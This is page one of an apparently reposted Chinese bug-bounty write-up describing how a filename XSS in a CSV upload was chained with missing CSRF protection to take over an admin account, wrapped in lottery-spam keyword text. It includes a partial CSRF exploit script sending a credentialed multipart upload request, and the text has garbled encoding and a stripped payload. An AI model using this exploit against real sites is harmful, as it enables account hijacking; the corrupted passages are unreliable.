手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

从XSS漏洞到四步CSRF利用实现账户劫持

来源:本站整理 作者:佚名 时间:2019-05-29 TAG: 我要投稿


作者?#23433;?#20037;在HackerOne上参加了一个漏洞众测邀请项目,目标测试应用(系统)的功能是为一些企业托管相关服务,普通用户可以通过该系统进行注册,然后使用这些服务。所以,该应用中会涉及到很多用户的敏?#34892;?#24687;处理操作。后来,作者由一个XSS漏洞入手,发现了上传功能中存在的四步CSRF漏洞隐患,最?#31449;?#36807;构造实现?#22235;?#26631;应用的管理员账户劫持。
在上传文件名处发现XSS漏洞
项目开始前?#25945;歟?#25105;?#22836;?#29616;了几个中危漏洞,并对它们做了一些分析标记,经深入研究之后,我意识到只要利用一个XSS漏洞,就能非常容易地实现提权。另外,由于更改用户注册邮箱时,目标应用没有诸如向邮箱发更改链接或输入当前密码的验证手?#21361;?#25152;以综合漏洞利用,可形成账户劫持。为此,?#19968;?#20102;好多时间去挖XSS漏洞。
但难处在于,由于目标应用对用户输入做了特殊字符过滤处理,所以貌似很难发现XSS漏洞。之后?#31243;?#26202;上,在继续测试过程中,我注意到,目标应用可以上传CSV文件来导入用户信息,这个功能估计值得深挖。于是,我在上传CSV文件中构造了一些特殊字符,但还是被过滤掉了。接着,我又从CSV文件名入手,在其中构造了XSS 语句:
.csv
终于实现了alert的窗口弹出!好了,大功告成。
XSS综合CSRF的尝试
但在后续分析中,我意识到即使构造的文件名XSS是持久型的,这个XSS漏洞目前只能在CSV文件上传时实现触发。也就是说,在CSV文件上传时,应用未做相关编码过滤处理,但文件上传到系统服务端后是受编码过滤的。因此来看,这个XSS漏洞目前?#27493;?#21482;是一个Self-XSS,是不在漏洞认可范围内的。尽管我试了很多XSS Payload,但还是不能绕过上传后的服务端过滤机制,无法转变这种Self-XSS
此时,我只有把它暂时放一放,希望在后续测试中能发现绕过方法或其它利用方式。接下来,在继续测试后,我发现目标应用竟然没有CSRF防护机制,所以,我就想到,能不能用CSRF请求来触发这个Self-XSS呢?于是,我就立马动手编写了一个CSRF请求脚本,如下:
html>
    body>
    script>history.pushState('', '', '/')script>
      script>
        var uploadId = UPDATE_THIS_WITH_ID;
        function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", `https://company.com/users/uploadFile?uploadId=${uploadId}`, true);
            xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------1566359571913061724703232384");
            xhr.withCredentials = true;
            var body = "-----------------------------1566359571913061724703232384\r\n" +
                "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\".csv\"\r\n" +
                "Content-Type: text/csv\r\n" +

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的,并不代表本站赞同其观点?#25237;?#20854;真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱[email protected],我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
      • 最近下载
      购买彩票权威网址
      手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中
      雷霆vs步行者 风暴魔域手游一天刷多少魔石 巫婆大财试玩 北京快乐飞艇官网 一起来捉妖全妖怪图鉴 比特币暴涨其它币暴跌 龙的财富试玩 弗洛vs都灵 火影忍者鸣人 奇迹觉醒官网礼包